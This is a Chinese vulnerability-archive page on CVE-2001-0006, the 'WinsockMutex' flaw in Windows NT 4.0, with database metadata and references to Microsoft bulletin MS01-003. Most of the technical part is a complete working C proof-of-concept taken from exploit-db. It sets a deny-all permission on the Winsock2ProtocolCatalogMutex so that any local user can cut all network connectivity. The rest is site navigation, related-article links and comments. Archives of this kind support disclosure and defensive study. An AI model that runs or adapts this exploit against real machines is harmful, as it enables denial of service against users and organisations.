子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

Windows NT Winsock2ProtocolCatalogMutex mutex控制许可漏洞

330

Windows NT Winsock2ProtocolCatalogMutex mutex控制许可漏洞

漏洞ID 1106185 漏洞类型 未知
发布时间 2001-01-24 更新时间 2005-10-12
图片[1]-Windows NT Winsock2ProtocolCatalogMutex mutex控制许可漏洞-安全小百科CVE编号 CVE-2001-0006
 		图片[2]-Windows NT Winsock2ProtocolCatalogMutex mutex控制许可漏洞-安全小百科CNNVD-ID CNNVD-200102-020
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/20596
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-020
|漏洞详情
WindowsNT4.0版本的Winsock2ProtocolCatalogMutexmutex具有inappropriateEveryone/Full控制许可。本地用户可以利用该漏洞修改对”NoAccess”的许可并使Winsock网络连接失效,也称为”WinsockMutex”漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/2303/info

Microsoft Windows NT 4.0 is subject to a denial of service due to the implementation of incorrect permissions in a Mutex object. A local user could gain control of the Mutex on a networked machine and deny all network communication. 

/*
/* mutation.c - (c) 2000, Arne Vidstrom, [email protected]
/*                        http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/

#include <windows.h>
#include <aclapi.h>

int main(void)
{
	PSID pEveryoneSID;
	SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
	PACL pDacl;
	DWORD sizeNeeded;

	AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pEveryoneSID);
	sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) + GetLengthSid(pEveryoneSID) - sizeof(DWORD);
	pDacl = (PACL) malloc(sizeNeeded);
	InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
	AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
	SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex", SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
	free(pDacl);
	return 0;
}
|参考资料

来源:MS
名称:MS01-003
链接:http://www.microsoft.com/technet/security/bulletin/MS01-003.asp
来源:BUGTRAQ
名称:20010126ntsecurity.nuadvisory:WinsockMutexVulnerabilityinWindowsNT4.0SP6andbelow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=98075221915234&w;=2
来源:XF
名称:winnt-mutex-dos(6006)
链接:http://xforce.iss.net/xforce/xfdb/6006

相关推荐: ThWboard Cross-Site Scripting Vulnerability

ThWboard Cross-Site Scripting Vulnerability 漏洞ID 1099381 漏洞类型 Input Validation Error 发布时间 2003-11-03 更新时间 2003-11-03 CVE编号 N/A CNN…

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
网络安全漏洞
# 漏洞# cnnvd# windows
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
3年前 4732
安全小百科-帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
3年前 1032
安全小百科-Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
3年前 426
安全小百科-Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
3年前 407
安全小百科-iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
3年前 351
安全小百科-S.u.S.E. Linux useradd Vulnerability
S.u.S.E. Linux useradd Vulnerability
S.u.S.E. Linux useradd Vulnerability
3年前 333
搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
048120
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47320
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
016000
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
011380
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
010320
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
08750
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛9月前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666